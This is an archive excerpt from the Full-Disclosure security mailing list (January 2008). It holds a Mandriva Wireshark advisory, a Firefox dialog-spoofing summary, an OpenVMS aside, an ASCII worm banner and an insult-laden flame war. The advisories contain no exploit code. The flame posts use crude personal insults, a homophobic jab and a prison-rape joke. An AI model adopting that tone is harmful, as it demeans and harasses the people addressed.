> that our current review might be too harsh, but can't change anything 
> without more information.
>
> If you want us to change our review, we can do that again and we can 
> do it in a non-biased way (regardless of all the rants and noise). We 
> need you to tell us about your service delivery methodologies, your 
> reporting methodologies, how you define specific service offerings, 
> what markets you play in, and if possible sanitized sample reports. We 
> won't publish any of that information directly, but we would use that 
> to produce your next review.
>
> We want our reviews to accurately and truthfully reflect the quality 
> and professionalism of the providers that we study. (In fact, if 
> anyone has any suggestions as to how we could better "rank" security 
> companies we'd be more than happy to listen and consider those 
> suggestions.)
>
> Hope this helps. This will be our last email about QuietMove unless 
> you request a redo of the current review. We will only redo the review 
> if you are able to provide us with accurate information to help us get 
> it done. We think that you should do it, because we think that you can 
> score much better than an F+. (You're clearly not an idiot and you do 
> have at least some experience.)
>
> -the end.
>
>
>
>
> Regards,
>   The Secreview Team
>   http://secreview.blogspot.com


Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

2008-01-02 Thread Line Noise
On Jan 2, 2008 11:32 AM,  <[EMAIL PROTECTED]> wrote:
> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years.  Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..

VMS was a fine and elegant system, written in Bliss, Coral, and
Pascal. Yes, indeed, my children. Pascal. Much of the C code currently
in OpenVMS replaces the Coral and Pascal. The Bliss is still about the
same ratio. Mmmm, Bliss32. Good memories, thanks.

-- 
It's Full Disclosure.
Post the disclosure here, not on your website.
You may not have a web site tomorrow.



[Full-disclosure] [ MDVSA-2008:1 ] - Updated wireshark packages fix multiple vulnerabilities

2008-01-02 Thread security


 ___
 
 Mandriva Linux Security Advisory   MDVSA-2008:1
 http://www.mandriva.com/security/
 ___
 
 Package : wireshark
 Date: January 2, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 4.0
 ___
 
 Problem Description:
 
 A number of vulnerabilities in the Wireshark program were found that
 could cause crashes, excessive looping, or arbitrary code execution.
 
 This update provides Wireshark 0.99.7 which is not vulnerable to
 these issues.
 
 An updated version of libsmi is also being provided, not because
 of security issues, but because this version of wireshark uses it
 instead of net-snmp for SNMP support.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6111
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6112
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6113
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6114
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6115
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6116
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6117
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6118
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6119
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6120
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6121
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6438
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6439
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6441
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6450
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6451
 http://www.wireshark.org/security/wnpa-sec-2007-03.html
 ___
 
 Updated Packages:
 

Re: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]

2008-01-02 Thread reepex
So you included me in here because my name has something to do with farm
equipment? Did your message have a point?

You wrote a bunch of nonsense flattering your favorite security stars and
then attempted to flame us with one liners that did not make sense.. It
seems you are caught in between the serious posters ( since you have no
skill, you cannot post anything useful), and the trolls ( because you are
not funny or convincing ).

My version of full disclosure is calling out idiots with CISSPs and PhDs who
post here and think their XSS and earth shattering barrages of 0x41's makes
them security experts.

On Jan 2, 2008 10:46 AM, <[EMAIL PROTECTED]> wrote:

> Critical Vulnerability in [Full-Disclosure]
>
> The problem with full disclosure is that everyone feels the need to
> fully disclose, even when their opinion and the information they
> are purporting to impart is, well, bollocks. You can't tell them to
> shut up as they think they're important and the internet gives them
> balls of steel and verbal diarrhoea, so we stumble from one tired
> flamewar to another with no useful content being published.
>
> It's embarrassing.
>
> I'm an advocate of FD as a concept. I believe that there is no such
> thing as an innocent on the internet and if you really are that
> dumb, then you deserve everything you get. FD (as one of many like-
> minded lists) forces the vendors to patch or die and eventually
> write quality code. FD (the concept, not the list) is the ultimate
> nuclear deterrent, without the mutually assured destruction lunacy.
>
> I have watched the posters to this list for some time. By far the
> vast majority are transparently kiddies, sitting on their painted-
> up laptops thinking of themselves as the techno-brats in the film
> "Hackers" and hoping to grow up to be like the guy in the film
> "Swordfish". They write in l33t5p34k and think that this somehow
> makes them informed. Kiddies are the lowest form of life in the
> hierarchy of information security and in the IT industry generally.
>
> You know who you are and so does everyone else. You are fools, and
> an embarrassment to the craft:
> Secreview (review of products/services you have never bought, are
> you the goatse.cz receiver?)
> Reepex (Isn't a reepex a bit of farm machinery?)
> Gobbles (A nickname for a gay male prostitute)
> Morning Wood (The holy grail of the viagra-abuser)
> Gmaggro ("high value target selection", are you completely cocking
> stupid?)
>
> Oh, the outrage.
>
> I can see it now. There will be armies of skiddies demanding that
> the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory
> messages concerning her skills and possible employment
> opportunities for her and her mother everywhere possible. Guess
> what, kids? I don't care.
>
> No, not even a little bit. Do what you like, I could care less and
> no one else cares if you live or die tonight, you sad, acne'd
> little dewdrops.
>
> Calmed down yet?
>
> Good. I want you to consider something.
>
> The FD list consists of the following content (and what it has to
> say):
>
> Advisories by vendors (we fixed this)
> Advisories by individuals (I tested that and found this)
> Advisories by infosec organisations (we found this)
> Funnies (self explanatory)
> Opinions (this sucks, what about that?)
> Skids (I did this, aren't I great, everyone else sucks?)
> Trolls (you suck)
> Trawlers (I have something 0day to buy or sell)
>
> The top three (ie the useful content) is available in any one of a
> hundred places, the bottom three are noise. The only people
> interested in the noise are those who keep track of it for a
> living.
>
> So, consider that by posting anything in the bottom three
> categories, you are drawing the attention of those who take an
> interest in your sad efforts to destabilise the technical crutch of
> society. These people are better than you in every important way,
> and if you so much as tiptoe across one of their lines, you'll wind
> up sharing a cell with a 7ft gorilla called george with a dead
> mouse and a pressing need to dry-cornhole your ringpiece 3 times a
> night and twice on sundays. Do yourselves a favour and STFU.
>
> What's left?
>
> The funnies and the opinions. I've laughed my tits off at posts by
> Messrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and I've
> been interested by a few others who will remain nameless as I can't
> list them all. Long live full disclosure, but keep in mind that
> you're only legends in your own bedrooms.
>
> later, pi
>

Re: [Full-disclosure] Was secreview crap - now OpenVMS!!

2008-01-02 Thread list spam
  W O R M S    A G A I N S T    N U C L E A R    K I L L E R S
 ___
 \__    _     __  _/
  \ \ \/\/ // /\ \   | \ \  | || | / //
   \ \ \  /  \  / // /__\ \  | |\ \ | || |/ //
\ \ \/ /\ \/ // __ \ | | \ \| || |\ \   /
 \_\  /__\  // /__\ \| |__\ | || |_\ \_/
  \___/
   \ /
\Your System Has Been Officically WANKed/
 \_/



On Jan 3, 2008 6:32 AM, <[EMAIL PROTECTED]> wrote:

> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
>
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years.  Back in the late 80's when it
> was at its most prevalent (and before it got 'Open' attached to it - we're
> talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily
> Bliss32..
>
> > Security relevance: UNHACKABLE! 
>
> WANK! (The old-timers will know what that means, and it's not what you
> newbies think... ;)
>

Re: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]

2008-01-02 Thread scott

And your earth-shattering views are *SO* important, you must make sure
everyone hears you. I think you just like to see your own posts.

I'm filtering your posts from now on as they are nothing but from a
wanna-be trying to play kids' games in a man's world.

I shouldn't waste my time responding to a teeny-bopper, anyway.

Scott
reepex wrote:
> So you included me in here because my name has something to do with farm
> equipment? Did your message have a point?
>
> You wrote a bunch of nonsense flattering your favorite security stars and
> then attempted to flame us with one liners that did not make sense.. It
> seems you are caught in between the serious posters ( since you have no
> skill, you cannot post anything useful), and the trolls ( because you are
> not funny or convincing ).
>
> My version of full disclosure is calling out idiots with CISSPs and PhDs who
> post here and think their XSS and earth shattering barrages of 0x41's makes
> them security experts.
>
> On Jan 2, 2008 10:46 AM, <[EMAIL PROTECTED]> wrote:
>
>> Critical Vulnerability in [Full-Disclosure]
>>
>> The problem with full disclosure is that everyone feels the need to
>> fully disclose, even when their opinion and the information they
>> are purporting to impart is, well, bollocks. You can't tell them to
>> shut up as they think they're important and the internet gives them
>> balls of steel and verbal diarrhoea, so we stumble from one tired
>> flamewar to another with no useful content being published.
>>
>> It's embarrassing.
>>
>> I'm an advocate of FD as a concept. I believe that there is no such
>> thing as an innocent on the internet and if you really are that
>> dumb, then you deserve everything you get. FD (as one of many like-
>> minded lists) forces the vendors to patch or die and eventually
>> write quality code. FD (the concept, not the list) is the ultimate
>> nuclear deterrent, without the mutually assured destruction lunacy.
>>
>> I have watched the posters to this list for some time. By far the
>> vast majority are transparently kiddies, sitting on their painted-
>> up laptops thinking of themselves as the techno-brats in the film
>> "Hackers" and hoping to grow up to be like the guy in the film
>> "Swordfish". They write in l33t5p34k and think that this somehow
>> makes them informed. Kiddies are the lowest form of life in the
>> hierarchy of information security and in the IT industry generally.
>>
>> You know who you are and so does everyone else. You are fools, and
>> an embarrassment to the craft:
>> Secreview (review of products/services you have never bought, are
>> you the goatse.cz receiver?)
>> Reepex (Isn't a reepex a bit of farm machinery?)
>> Gobbles (A nickname for a gay male prostitute)
>> Morning Wood (The holy grail of the viagra-abuser)
>> Gmaggro ("high value target selection", are you completely cocking
>> stupid?)
>>
>> Oh, the outrage.
>>
>> I can see it now. There will be armies of skiddies demanding that
>> the l33tz hack this [EMAIL PROTECTED], spam him, pwn him, and post defamatory
>> messages concerning her skills and possible employment
>> opportunities for her and her mother everywhere possible. Guess
>> what, kids? I don't care.
>>
>> No, not even a little bit. Do what you like, I could care less and
>> no one else cares if you live or die tonight, you sad, acne'd
>> little dewdrops.
>>
>> Calmed down yet?
>>
>> Good. I want you to consider something.
>>
>> The FD list consists of the following content (and what it has to
>> say):
>>
>> Advisories by vendors (we fixed this)
>> Advisories by individuals (I tested that and found this)
>> Advisories by infosec organisations (we found this)
>> Funnies (self explanatory)
>> Opinions (this sucks, what about that?)
>> Skids (I did this, aren't I great, everyone else sucks?)
>> Trolls (you suck)
>> Trawlers (I have something 0day to buy or sell)
>>
>> The top three (ie the useful content) is available in any one of a
>> hundred places, the bottom three are noise. The only people
>> interested in the noise are those who keep track of it for a
>> living.
>>
>> So, consider that by posting anything in the bottom three
>> categories, you are drawing the attention of those who take an
>> interest in your sad efforts to destabilise the technical crutch of
>> society. These people are better than you in every important way,
>> and if you so much as tiptoe across one of their lines, you'll wind
>> up sharing a cell with a 7ft gorilla called george with a dead
>> mouse and a pressing need to dry-cornhole your ringpiece 3 times a
>> night and twice on sundays. Do yourselves a favour and STFU.
>>
>> What's left?
>>
>> The funnies and the opinions. I've laughed my tits off at posts by
>> Messrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and I've
>> been interested by a few others who will remain nameless as I can't
>> list them all. Long live full disclosure, but keep in mind that
>> you're only legends in your

[Full-disclosure] Yet another Dialog Spoofing Vulnerability - Firefox Basic Authentication

2008-01-02 Thread avivra
Summary
Mozilla Firefox allows spoofing the information presented in the basic
authentication dialog box. This can allow an attacker to conduct phishing
attacks by tricking the user into believing that the authentication dialog box
is from a trusted website.

Affected versions
Mozilla Firefox v2.0.0.11. 
Prior versions and other Mozilla products may also be affected.

http://aviv.raffon.net/2008/01/02/YetAnotherDialogSpoofingFirefoxBasicAuthentication.aspx

